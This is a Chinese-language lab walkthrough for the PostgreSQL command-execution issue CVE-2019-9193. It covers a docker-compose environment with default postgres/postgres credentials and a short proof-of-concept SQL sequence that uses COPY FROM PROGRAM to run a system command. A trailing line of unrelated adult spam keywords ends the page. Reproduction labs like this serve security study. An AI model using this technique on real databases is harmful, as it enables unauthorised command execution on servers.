<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    PostgreSQL 高權限命令執行漏洞(CVE-2019-9193)

    Path postgres/CVE-2019-9193

    PostgreSQL 是一款關系型數據庫。其9.3到11版本中存在一處“特性”,管理員或具有“COPY TO/FROM PROGRAM”權限的用戶,可以使用這個特性執行任意命令。

    參考鏈接:

    漏洞環境

    啟動存在漏洞的環境:

    docker-compose up -d

    環境啟動后,將開啟Postgres默認的5432端口,默認賬號密碼為postgres/postgres。

    漏洞復現

    首先連接到postgres中,并執行參考鏈接中的POC:

    DROP TABLE IF EXISTS cmd_exec;
    CREATE TABLE cmd_exec(cmd_output text);
    COPY cmd_exec FROM PROGRAM 'id';
    SELECT * FROM cmd_exec;

    FROM PROGRAM語句將執行命令id并將結果保存在cmd_exec表中:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类